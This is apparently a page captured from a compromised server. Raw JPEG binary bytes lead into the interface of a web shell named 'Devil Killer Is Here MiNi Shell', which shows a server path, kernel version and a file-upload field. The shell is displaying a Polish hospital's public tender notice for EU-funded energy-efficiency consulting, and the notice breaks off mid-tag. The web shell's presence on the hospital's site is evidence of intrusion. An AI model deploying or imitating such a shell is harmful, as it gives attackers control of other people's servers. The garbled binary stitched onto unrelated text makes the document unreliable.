JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250918/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250918/0043112901-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Przygotowanie dokumentacji aplikacyjnej wraz z kompleksową usługą doradczą w zakresie objętym Naborem w ramach Programu Fundusze Europejskie dla Śląskiego 2021-2027 nr FESL.02.01-IZ.01-203/25 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">SAMODZIELNY PUBLICZNY ZAKŁAD OPIEKI ZDROWOTNEJ WOJEWÓDZKI SZPITAL SPECJALISTYCZNY NR 3 W RYBNIKU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 272780323</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Energetyków 46</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rybnik</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">44-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL227 - Rybnicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@szpital.rybnik.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.szpital.rybnik.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przygotowanie dokumentacji aplikacyjnej wraz z kompleksową usługą doradczą w zakresie objętym Naborem w ramach Programu Fundusze Europejskie dla Śląskiego 2021-2027 nr FESL.02.01-IZ.01-203/25 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-65597a64-be72-42f0-b5d7-0b699a6ead59</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00431129</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-09-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00041263/14/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Przygotowanie wniosku o dofinansowanie w ramach naboru projektów (m.in. z Krajowego Planu Odbudowy)</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Program Fundusze Europejskie dla Śląskiego 2021-2027 nr FESL.02.01-IZ.01-203/25 w ramach Priorytetu II Fundusze Europejskie na zielony rozwój Działanie 02.01 Efektywność energetyczna budynków użyteczności publicznej. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/szpital.rybnik <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/szpital.rybnik</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Z zastrzeżeniem postanowień<br/>zawartych w rozdz. XIII oraz VII SWZ,<br/>komunikacja między Zam. a Wykonawcami może się odbywać wyłącznie przy użyciu środków komunikacji elektr.w rozumieniu<br/>ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz.U. z 2020 r. poz. 344), tj:<br/>1) poprzez Platformę zakupową, która dostępna jest pod adresem: https://platformazakupowa.pl/pn/szpital.rybnik<br/>2) w sytuacjach awaryjnych (np. w przypadku braku działania Platformy zakupowej) zamawiający może również komunik.się z<br/>wyk.za pomocą poczty elektronicznej z adresu e-mail: zp@szpital.rybnik.pl 4. Dokumenty elektroniczne, oświadczenia lub<br/>elektroniczne kopie dokumentów lub oświadczeń, o których mowa w Rozdziale IV specyfikacji warunków zamówienia składane<br/>są̨przez wykonawcę za pośrednictwem Platformy zakupowej: https://platformazakupowa.pl/pn/szpital.rybnik<br/>5. Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być<br/>zgody z aktualnymi wymaganiami określonymi w Rozporządzeniu Ministra Rozwoju. Pracy i Technologii z dnia 23 grudnia 2020 r. w<br/>sprawie podmiotowych środków dowod. oraz innych dok. lub ośw., jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 r.<br/>poz. 2415). 6. Wszelkie czynności podejmowane przez wykonawcę w toku postępowania wymagają dla swej skuteczności<br/>dołączenia dokumentów potwierdzających uprawnienie osoby podpisującej do reprezentowania firmy wykonawcy, chyba że<br/>zamawiający dysponuje już odpowiednimi dokumentami złożonymi w toku danego postępowania. 7. Zamawiający lub Wykonawca<br/>przekazując oświadczenia, wnioski, zawiadomienia oraz informacje przy użyciu środków komunikacji elektronicznej w rozumieniu<br/>ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną, mogą zażądać od drugiej strony niezwłocznego<br/>potwierdzenia ich otrzymania. 8. Komunikacja ustna dopuszczalna jest wyłącznie w odniesieniu do informacji, które nie są istotne, w<br/>szczególności nie dotyczą ogłoszenia o zamówieniu lub dokumentów zamówienia, ofert, o ile jej treść jest dokumentowana<br/>(wymagana jest pisemna notatka z ustnej rozmowy). 9. Oferty, oświadczenia, o których mowa w art. 125 ust. 1 ustawy Pzp,<br/>podmiotowe środki dowodowe, w tym oświadczenie, o którym mowa w art. 117 ust. 4 ustawy Pzp, oraz zobowiązanie podmiotu<br/>udostępniającego zasoby, o którym mowa w art. 118 ust. 3 ustawy Pzp, zwane dalej „zobowiązaniem podmiotu udostępniającego<br/>zasoby”, przedmiotowe środki dowodowe, pełnomocnictwo, sporządza się w postaci elektronicznej, w formatach danych określonych<br/>w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących<br/>zadania publiczne (Dz.U. z 2021 r. poz. 670 ze zm.), z zastrzeżeniem formatów, o których mowa w art. 66 ust. 1 ustawy, z<br/>uwzględnieniem rodzaju przekazywanych danych.<br/>10. Informacje, oświadczenia lub dokumenty, inne niż określone w ust. 9 niniejszego rozdziału SWZ, przekazywane w postępowaniu<br/>o udzielenie zamówienia, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach wydanych na<br/>podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne lub jako<br/>tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej, wskazanych przez<br/>Zamawiającego w SWZ. 11. W przypadku gdy dokumenty elektroniczne w postępowaniu o udzielenie zamówienia, przekazywane<br/>przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu<br/>przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2020 r. poz. 1913), Wykonawca, w celu<br/>utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku. 12. Podmiotowe środki<br/>dowodowe, przedmiotowe środki dowodowe oraz inne dokumenty lub oświadczenia, sporządzone w języku obcym przekazuje się<br/>wraz z tłumaczeniem na język polski.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”<br/>a) Zamawiający informuje, że:- administratorem danych osobowych jest SPZOZ WSS Nr 3 w Rybniku, ul. Energetyków 46,44-200<br/>Rybnik;<br/>- inspektorem ochrony danych osobowych w SPZOZ WSS Nr 3 w Rybniku jest Inspektor Danych Osobowych, kontakt:iodo@szpital.rybnik.pl;<br/>- dane osobowe osoby, której dane dotyczą, przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu wypełnienia<br/>obowiązków związanych z prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego prowadzonego w trybie<br/>podstawowym;<br/>Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach Ustawy pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego. Konsekwencje<br/>niepodania określonych danych wynikają z Ustawy pzp. Odbiorcami Pani/Pana danych osobowych mogą być:<br/>osoby/podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 ust. 1 Ustawy pzp i/lub zewnętrzna<br/>kancelaria prawna, i/lub operator pocztowy w rozumieniu ustawy z dnia 23 listopada 2012 r. Prawo pocztowe (Dz. U. z 2020 r. poz.<br/>1041, 2320 z późn. zmianami), i/lub posłaniec (kurier) dostarczający korespondencję na zasadach określonych w art. 65 ust. 2, 401<br/>ust. 1, 508 ust. 2 Ustawy pzp. Pani/Pana dane osobowe mogą zostać powierzone do przetwarzania zewnętrznemu podmiotowi<br/>dostarczającemu (realizującemu) usługi teleinformatyczne i/lub narzędzia/urządzenia komunikacji elektronicznej.<br/>- Administrator przechowuje protokół postępowania wraz z załącznikami przez okres 4 lat od dnia zakończenia postępowania o<br/>udzielenie zamówienia (w sposób gwarantujący jego nienaruszalność). Jeżeli okres obowiązywania umowy w sprawie zamówienia<br/>publicznego przekracza 4 lata, Administrator przechowuje protokół postępowania wraz z załącznikami przez cały okres<br/>obowiązywania umowy w sprawie zamówienia publicznego. Administrator przechowuje dokumentację konkursu przez okres 4 lat od<br/>dnia ustalenia wyników konkursu w postaci, w jakiej została ona sporządzona lub przekazana, w sposób gwarantujący jej<br/>nienaruszalność i możliwość odczytania zgodnie z Ustawą pzp (art. 78 ust. 1 i ust. 4, art. 358 ust. 1).<br/>- Zebrane od Pana/Pani dane osobowe nie będą przekazywane do podmiotów poza Unią Europejską lub Europejskim Obszarem<br/>Gospodarczym.<br/>- Ma Pani/Pan prawo do:<br/>żądania od Administratora dostępu do danych osobowych dotyczących Pani/Pana osoby;<br/>żądania od Administratora sprostowania danych osobowych dotyczących Pani/Pana osoby;<br/>żądania od Administratora usunięcia danych osobowych dotyczących Pani/Pana osoby, w sytuacji, gdy przetwarzanie danych nie<br/>następuje w celu wywiązania się z obowiązku wynikającego z przepisu prawa;<br/>żądania od Administratora ograniczenia przetwarzania danych osobowych dotyczących Pani/Pana osoby.<br/>Zakres każdego z powyższych praw oraz sytuacje, w których można z nich skorzystać, wynikają z przepisów RODO oraz Ustawy<br/>pzp. Z powyższych praw może Pan/Pani skorzystać składając wniosek u Administratora</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Pani/Panu:w związku z art. 17 ust. 3 lit. b), d) lub e) RODO prawo do<br/>usunięcia danych osobowych; prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; na podstawie art. 21<br/>RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych<br/>osobowych jest art. 6 ust. 1 lit. c) RODO. Ma Pani/Pan prawo wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych,<br/>gdy uzna Pani/Pan, iż przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO. W odniesieniu do<br/>Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO.<br/>Jednocześnie Administrator przypomina o ciążącym na Pani/Panu obowiązku informacyjnym wynikającym z art. 14 RODO<br/>względem osób fizycznych, których dane mogą zostać przekazane administratorowi w związku z prowadzonym postępowaniem i<br/>które Administrator pośrednio pozyska od kontrahenta biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w art. 14 ust. 5 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">TT-355-TP/59-2025.AR</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest świadczenie przez Wykonawcę na rzecz Zamawiającego kompleksowej usługi doradczej mającej na celu pozyskanie dofinansowania na przedsięwzięcie, określone przez Zamawiającego, a możliwe do dofinansowania w ogłoszonym Naborze w ramach Programu Fundusze Europejskie dla Śląskiego 2021-2027 nr FESL.02.01 IZ.01-203/25 w ramach Priorytetetu II Fundusze Europejskie na zielony rozwój Działanie 02.01 Efektywność energetyczna budynków użyteczności publicznej (zwanego dalej „Naborem FESL.02.01.”) polegającej na: <br/>a.	analizie Naboru FESL.02.01. pod kątem możliwości pozyskania dofinansowania, a następnie rekomendacji optymalnego zakresu rzeczowego, o który Zamawiający może aplikować. <br/>b.	przygotowywanie kompleksowej dokumentacji aplikacyjnej. <br/><br/>W ramach przedsięwzięcia Zamawiający planuje podjęcie działań mających na celu zwiększenie efektywności energetycznej Pawilonu nr 6 i 7 poprzez głęboką modernizację energetyczną. W ramach zakresu rzeczowego wstępnie przewidziano między innymi ocieplenie ścian zewnętrznych, wymianę instalacji c.o., częściową modernizację instalacji wentylacji mechanicznej (odzysk ciepła), częściową wymianę oświetlenia na LED-owe z uwzględnieniem zarządzania oświetleniem w miejscach do tego dostosowanych oraz wymianę stolarki okiennej i drzwiowej. <br/>2.	Przedmiot zamówienia obejmuje m.in. następujące czynności:<br/>1)	analizę Naboru FESL.02.01., w zakresie określonym w § 2 ust. 2 Umowy przedstawioną w formie sprawozdania wraz z rekomendacją, zawierającą ocenę możliwości skutecznego aplikowania o środki, tj. spełnienia przez Zamawiającego wymaganych dla Naboru FESL.02.01. kryteriów wraz z kryteriami punktowymi w kontekście dokumentów strategicznych, o których mowa w Regulaminie Naboru i w Kryteriach oceny wniosku oraz kryteriach horyzontalnych i szczegółowych wraz z ich bieżącą aktualizacją. <br/>2)	w przypadku gdy analiza, o której mowa w pkt 1) wykaże możliwość skutecznego aplikowania Zamawiającego o środki w Naborze FESL.02.01., przygotowanie Dokumentacji Aplikacyjnej określonej w ogłoszeniu z uwzględnieniem ewentualnych zmian i wytycznych dokonywanych w dokumentacji (zwanej dalej: Dokumentacją Aplikacyjną). <br/>Przez Dokumentację Aplikacyjną rozumie się dokumentację wymaganą dla danego Naboru w tym w szczególności:<br/>a)	Wniosek o dofinansowanie Projektu,<br/>b)	Analiza zgodności projektu z zasadami pomocy publicznej i/lub pomocy de minimis <br/>c)	Analiza finansowa i ekonomiczna,<br/>d)	Audyt energetyczny w jednej z dwóch form:<br/>audyt energetyczny sporządzony na szablonie (wzór załączony do Regulaminu) ub audyt energetyczny sporządzony zgodnie z właściwymi przepisami wraz z wypełnioną kartą audytu energetycznego (wzór załączony do Regulaminu wyboru projektów) oraz świadectwo charakterystyki energetycznej dla budynku przed modernizacją energetyczną – opcja ta wymaga uzasadnienia.<br/>e)	Ekspertyza ornitologiczna i chiropterologiczna,<br/>f)	Analiza DNSH,<br/>g)	Program funkcjonalno – użytkowy dla realizacji w trybie zaprojektuj i wybuduj, zgodnie z Rozporządzeniem Ministra Rozwoju i Technologii z dnia 20 grudnia 2021 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno – użytkowego (Dz.U. z 2021 r. poz. 2454),<br/>h)	Studium wykonalności,<br/>i)	Inne niż wymienione powyżej załączniki do wniosku o dofinansowanie zgodnie z listą podaną w ogłoszonym Naborze.<br/><br/>3)	inne czynności, związane z procesem pozyskiwania dofinansowania:<br/>a)	w przypadku wezwania do korekty lub uzupełnień, prowadzenie korespondencji w trakcie lub Wniosku o dofinansowanie Projektu, w tym m.in. kontakty robocze z Instytucją Organizującą Nabór FESL.02.01.,<br/>b)	wykonanie korekt i uzupełnień zgodnie z wezwaniem,<br/>c)	w przypadku odrzucenia Wniosku o dofinansowanie Projektu podczas oceny formalnej i merytorycznej, przygotowanie dokumentacji umożliwiającej wniesienie przewidzianych przepisami lub dokumentacją dotyczącą Naboru FESL.02.01. środków odwoławczych. Decyzja w zakresie złożenia/odstąpienia od złożenia środka odwoławczego należy do Zamawiającego,<br/>d)	w przypadku przyjęcia Wniosku o dofinansowanie Projektu, opracowanie załączników do Umowy o dofinansowanie na wzorach zawartych w dokumentacji dotyczącej Naboru FESL.02.01. oraz nadzór nad terminowością przekazania załączników, których uzyskanie spoczywa na Zamawiającym oraz nadzór nad procesem podpisywania Umowy o dofinansowanie. <br/><br/>Szczegółowy opis przedmiotu zamówienia, w tym zakres świadczonej usługi zawierają załączniki:<br/>1) Opis przedmiotu zamówienia – załącznik nr 2 do SWZ,<br/>2) Projektowane postanowienia umowy, które zostaną wprowadzone do treści umowy – załącznik nr 4 do<br/>SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71241000-9 - Studia wykonalności, usługi doradcze, analizy</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocenie i porównaniu poddane zostaną oferty niepodlegające odrzuceniu. Zamawiający dokona oceny ofert w zakresie kryteriów, o których mowa w Rozdziale XVI SWZ. W tym celu przeprowadzona zostanie ocena każdej<br/>oferty. Zamawiający dokona weryfikacji oraz przypisania punktów dla poszczególnych kryteriów oceny oferty oraz wyliczy łączną ocenę punktową oferty. Za ofertę najkorzystniejszą uznana zostanie oferta, która w sumie uzyska największą liczbę punktów. Sposób określania wagi kryteriów oceny ofert - procentowo, a w przypadku kryterium dodatkowe doświadczenie Koordynatora - punktowo<br/>2) Przy wyborze oferty najkorzystniejszej zamawiający będzie kierował się następującymi kryteriami:<br/>1. cena [C] 60 %<br/>2. dodatkowe doświadczenie Koordynatora (D) 40%<br/>Wyniki wszystkich obliczeń dokonywanych w ww.kryteriach podlegają zaokrągleniu do dwóch miejsc po przecinku przy zachowaniu<br/>matematycznej zasady zaokrąglania liczb, tj. - jeśli pierwsza (licząc od lewej strony) z odrzuconych cyfr jest mniejsza od 5, to ostatnia pozostawiona cyfra nie ulega zmianie,- jeśli pierwsza (licząc od lewej strony) z odrzuconych cyfr jest większa lub równa 5, to (niezależnie od tego, co jest za nią) ostatnią pozostawioną cyfrę powiększa się o 1, chyba że taka dokładność nie pozwoli na zróżnicowanie łącznej punktacji ofert. W takim przypadku zaokrąglenie nastąpi do dalszej liczby miejsc po przecinku, chyba że dalsze zwiększanie dokładności obliczeń nie skutkuje zróżnicowaniem łącznej punktacji ofert.<br/>Łączna punktacja jest dla danej oferty obliczana jako suma punktacji uzyskanej w wyżej opisanych kryteriach. Za ofertę najkorzystniejszą uznana zostanie oferta, która w sumie uzyska największą liczbę punktów. Sposób określania wagi kryteriów oceny ofert - procentowo.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">dodatkowe doświadczenie Koordynatora</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span 